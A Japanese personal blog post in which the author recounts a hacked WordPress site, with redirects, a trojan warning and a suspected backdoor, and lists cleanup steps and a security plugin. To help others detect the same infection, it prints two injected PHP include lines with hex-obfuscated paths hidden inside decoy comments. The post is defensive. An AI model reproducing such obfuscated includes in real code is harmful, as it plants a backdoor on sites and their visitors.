お得なAmazonタイムセールはこちらをクリック！！

【閉店】蒲田矢口渡の羽田タップルームで美味しいクラフトビールが安く飲めるよ！

【片頭痛】東京頭痛クリニックでMRI撮ってきた【頭痛外来】

【口コミ】詰め替えそのまま！シャンプーボトルもすっきりで便利！

【企業案件】ブログ記事執筆依頼の流れを紹介します！

【口コミ】バンコクおすすめ格安ホテル日本人宿ゲストハウスEZ STAY Bangkok(閉店)

【まとめ】グランドピアノが弾ける東京都内レンタルスタジオ練習室

ピアノ弾き語り好きなら聴きに行こう！88Oh! Pianoman Summit 2017

3月9日(レミオロメン)のピアノ弾き語りに挑戦してみた！

【レビュー】一番人気のNASキットSynology DS218jが良い感じ！価格は2万円台！【比較】

【体験報告】ニトリの無料インテリア相談の3Dプランニングが超おすすめ！！

デリバリーアプリmenuはクーポンがお得！出前館やUber Eatsとどっちがおすすめ？

【費用】カンボジア・アンコールワット3泊5日一人旅行は9万円！

【比較】楽天日本株4.3倍ブル(投資信託)と楽天225ダブルブル(信用ETF)どっちがいい？

【完全版】ブロガー必見！おすすめサイト/サービスツール比較まとめ【メモ】

【タイ旅行記】SIMカード~ワットアルン~ワットポー~ワットプラケオ~サイアム周辺

【蒲田】パーソナルトレーニングジムGround worksに一ヶ月通ってみた！1万円クーポンで超お得！

【体験レポ】おすすめメンズ眉毛専門サロン粋華男製作所の訪問記！

洗濯機10年保証なら東京電力TEPCOの家電修理サービス保険で間違いなし！

ハック?クラック?WordPressでトロイの木馬検出したらやることリスト

Wordpress

2020.12.17

この記事は約5分で読めます。

ふるのーと

ふるのーと

「助けて～」

ここ最近ブログの調子が悪いので状況をメモしておきますね。

スポンサーリンク

目次

マルウェア・ウィルス・クラッキング・ハッキング
リダイレクトされる
トロイの木馬が表示される
試してみたこと
しばらくするとまた再発する
バックアップは取っておこう
はてなに移行しようかな
追記：バックドア型ウィルスFilesmanだった？
Anti-Malware Security and Brute-Force Firewallを入れよう
1. [追記]Anti-Malware Security and Brute-Force Firewallも駄目かも。

マルウェア・ウィルス・クラッキング・ハッキング

このあたりはよく分かりませんが、マルウェアとかウィルスとかいうのにかかったぽいです。

クラッキングというかハッキングというか、、まあ、攻撃されました(T_T)

リダイレクトされる

普通にアクセスすると、知らないページに飛ばされます。

すごい怪しいです。

ちなみにTOPページやカテゴリページが高い確率でやられます。

中には普通の個別ページもやられているところもあります。

us.aleatherk.top/dbccza(省略)

こんな感じのリンク経由で怪しいサイトに飛ばされます。

トロイの木馬が表示される

JS/TrojanDownloader.FakejQuery.B トロイの木馬

パソコン(Chrome、Edge)でトップページアクセスしようとすると、上記画面が出てアクセスできないんですよ。

これは焦りますよね。

管理画面にはアクセス出来る

良かったのかはわかりませんが、管理画面にはアクセスできるので色々試してみることはできました。

スマホからはアクセスできる（ときがある）

スマホからはアクセス出来るときがあるんですよね。

良いのか悪いのかはわかりませんが。

TOPページ、メニューページ以外はアクセスできるっぽい

全部は見てないですが、トップページやメニューページはアクセス出来るみたいなんですよね。

試してみたこと

WordPressやプラグイン、テーマを削除・再インストール

サーバからFFFTPでファイルを全て完全に削除して１から再インストール。

ファイルは前にバックアップを奇跡的に取っておいたものを利用。

(そもそもこの時点で攻撃されていたんではないか疑惑もあるのでなんともいえない。。。)

バックアップファイルはアップする前にウィルススキャンはしてからアップロード。

chromeブラウザのキャッシュクリア

一応ブラウザのキャッシュもクリアしておきました。

パスワードを複雑なものに変更・Google二段階承認プラグイン

意味があるかわかりませんが、パスワードを少々複雑なものに変更しました。

プラグインも入れてGoogle二段階承認プラグイン(Google Authenticator)も使うようにしました。

index.phpとwp-settings.phpが書き換えられていたので修正

パッと見てわかったところだと、index.phpとwp-settings.phpが書き換えれられていたので修正しました。

まずはindex.phpです。

赤枠の部分明らかにおかしいですよね。

次はwp-settings.phpです。

350行目だし、何だかよく分からないし、気づけないですよね。こんなの。(白目)

このコードを見かけたら気をつけてね

一応テキスト検索で引っかかるようにテキストでも書いておきますね。

include “\x2fhom\x65/me\x6ctin\x67ton\x65/fu\x6clno\x74ebl\x6fg.c\x6fm/p\x75bli\x63_ht\x6dl/w\x70-co\x6eten\x74/up\x67rad\x65/he\x61der\x2ephp”;

* WordPre*/include /*ss Widget Factory Object
* @global WP_Widget_Fa*/”\x2fhom\x65/me\x6ctin\x67ton\x65/fu\x6clno\x74ebl\x6fg.c\x6fm/p\x75bli\x63_ht\x6dl/w\x70-co\x6eten\x74/pl\x75gin\x73/yo\x75tub\x65-em\x62ed-\x70lus\x2fdir\x73.ph\x70″;/*ctory $wp_widget_factory

login.php、lib10.php、utf.phpを削除

ダウンロードも出来ないので、中身は見れませんが、

ダウンロード出来ない時点でかなり怪しいので以下は削除しました。

login.php
lib10.php
utf.php

しばらくするとまた再発する

理由はわかりませんが、再発していてココ１ヶ月はこんな感じで復旧作業くらいしかやっていません。

今は大丈夫なのでココらへんで落ち着いて欲しいです。(´；ω；｀)

バックアップは取っておこう

まあ、何はともあれバックアップを少し前にとっておいたのは奇跡でした。

それほど大変でもないのでバックアップを取っていない人は今すぐにでもバックアップを取るべきですね。

はてなに移行しようかな

時代の流れには逆行する形になりますが、こんな作業するためにブログ書いているわけではないのでいよいよはてなに移行する時が来たのかもしれませんね。

追記：バックドア型ウィルスFilesmanだった？

パスワード変更とか、ファイル修正とか、バックドアウィルスだとあんまり意味ないらしいです。

直しても裏口からいたずらされちゃうらしいです(白目)

Anti-Malware Security and Brute-Force Firewallを入れよう

取り敢えず、怪しいと思ったらAnti-Malware Security and Brute-Force Firewallというプラグインを入れましょう。

https://ja.wordpress.org/plugins/gotmls/

テーマをチェックするプラグインとか、プラグインをチェックするプラグインとかより、Anti-Malware Security and Brute-Force Firewallのほうがいいです。

[追記]Anti-Malware Security and Brute-Force Firewallも駄目かも。

一度被害にあうと、結構対策大変ですよね。

Anti-Malware Security and Brute-Force Firewallもあまり効果ないかもしれません。。

バックアップを取ってあれば、それをもって別のレンタルサーバに構築してみるのが良いかもしれません。

無料期間に移行してみて、駄目だったら、解約してもいいですしね。

ConoHa WING、mixhost 、エックスサーバーなど大手がセキュリティ的にも安心です。

同じような被害にあわれた方の参考になれば。

タイトルとURLをコピーしました